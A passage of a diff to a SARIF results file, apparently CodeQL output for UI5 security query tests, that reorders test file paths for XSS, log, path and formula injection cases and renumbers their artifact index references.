"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 191 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 192 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 193 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 194 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", "uriBaseId" : "%SRCROOT%", "index" : 195 } @@ -41323,37 +15137,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 199 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 200 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", "uriBaseId" : "%SRCROOT%", "index" : 201 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 202 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 203 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", "index" : 204 } @@ -41377,31 +15191,31 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 208 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 209 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 210 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 211 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 212 } @@ -41413,19 +15227,19 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 214 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 215 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 216 } @@ -41443,13 +15257,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 219 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 220 } @@ -41461,43 +15275,43 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 222 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 223 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 224 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 225 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 226 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 227 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 228 } @@ -41527,37 +15341,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 233 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 234 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 235 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 236 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", "uriBaseId" : "%SRCROOT%", "index" : 237 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 238 } @@ -42253,55 +16067,55 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 354 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 355 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", "index" : 356 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 357 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 358 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 359 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 360 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", "uriBaseId" : "%SRCROOT%", "index" : 361 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", "index" : 362 } @@ -42313,13 +16127,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 364 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 365 } @@ -42415,7 +16229,7 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 381 } @@ -42445,13 +16259,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", "uriBaseId" : "%SRCROOT%", "index" : 386 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 387 } @@ -42487,13 +16301,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 393 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", "uriBaseId" : "%SRCROOT%", "index" : 394 } @@ -42511,13 +16325,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", "index" : 397 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 398 } @@ -42541,91 +16355,91 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 402 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 403 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 404 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 405 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 406 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 407 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 408 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 409 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 410 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 411 } }, { "location" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uri" : "javascript/heuristic-models/tests/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 412 } }, { "location" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uri" : "qlt.conf.json", "uriBaseId" : "%SRCROOT%", "index" : 413 } }, { "location" : { - "uri" : "qlt.conf.json", + "uri" : "scripts/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 414 } }, { "location" : { - "uri" : "scripts/codeql-pack.lock.yml", + "uri" : "scripts/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 415 } }, { "location" : { - "uri" : "scripts/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 416 } @@ -45265,7 +19079,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 361 + "index" : 362 }, "region" : { "startLine" : 8, @@ -45323,7 +19137,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", "uriBaseId" : "%SRCROOT%", - "index" : 360 + "index" : 361 }, "region" : { "startLine" : 5, @@ -45341,7 +19155,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 361 + "index" : 362 }, "region" : { "startLine" : 8, @@ -45392,7 +19206,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 387 + "index" : 386 }, "region" : { "startLine" : 8, @@ -45413,7 +19227,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 393 + "index" : 398 }, "region" : { "startLine" : 5, @@ -45468,7 +19282,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 387 + "index" : 386 }, "region" : { "startLine" : 8, @@ -45489,7 +19303,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 393 + "index" : 398 }, "region" : { "startLine" : 5, @@ -45519,7 +19333,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 398 + "index" : 397 }, "region" : { "startLine" : 8, @@ -45540,7 +19354,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 403 + "index" : 402 }, "region" : { "startLine" : 5, @@ -45595,7 +19409,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 398 + "index" : 397 }, "region" : { "startLine" : 8, @@ -45616,7 +19430,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 403 + "index" : 402 }, "region" : { "startLine" : 5, @@ -45860,7 +19674,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 8, @@ -45881,7 +19695,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 5, @@ -45900,7 +19714,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 163 + "index" : 166 }, "region" : { "startLine" : 10, @@ -45918,7 +19732,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 8, @@ -45939,7 +19753,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 5, @@ -46751,7 +20565,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 356 }, "region" : { "startLine" : 8, @@ -46772,7 +20586,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 356 }, "region" : { "startLine" : 5, @@ -46808,7 +20622,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 356 }, "region" : { "startLine" : 8, @@ -46829,7 +20643,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 356 }, "region" : { "startLine" : 5, @@ -46858,7 +20672,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 22, @@ -46879,7 +20693,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 8, @@ -46898,7 +20712,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 407 + "index" : 406 }, "region" : { "startLine" : 9, @@ -46916,7 +20730,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 22, @@ -46938,7 +20752,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 15, @@ -46957,7 +20771,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 407 + "index" : 406 }, "region" : { "startLine" : 9, @@ -46975,7 +20789,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 22, @@ -46996,7 +20810,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 8, @@ -47014,7 +20828,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 15, @@ -47162,7 +20976,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 216 + "index" : 214 }, "region" : { "startLine" : 17, @@ -47183,7 +20997,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 220 + "index" : 219 }, "region" : { "startLine" : 5, @@ -47202,7 +21016,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 214 + "index" : 215 }, "region" : { "startLine" : 9, @@ -47220,7 +21034,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 216 + "index" : 214 }, "region" : { "startLine" : 8, @@ -47238,7 +21052,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 216 + "index" : 214 }, "region" : { "startLine" : 17, @@ -47259,7 +21073,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 220 + "index" : 219 }, "region" : { "startLine" : 5, @@ -47289,7 +21103,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 23, @@ -47310,7 +21124,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 227 + "index" : 228 }, "region" : { "startLine" : 5, @@ -47329,7 +21143,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 228 + "index" : 224 }, "region" : { "startLine" : 9, @@ -47347,7 +21161,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 9, @@ -47365,7 +21179,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 15, @@ -47383,7 +21197,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 15, @@ -47401,7 +21215,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 17, @@ -47419,7 +21233,7 @@ "artifactLocation" : { "uri" : 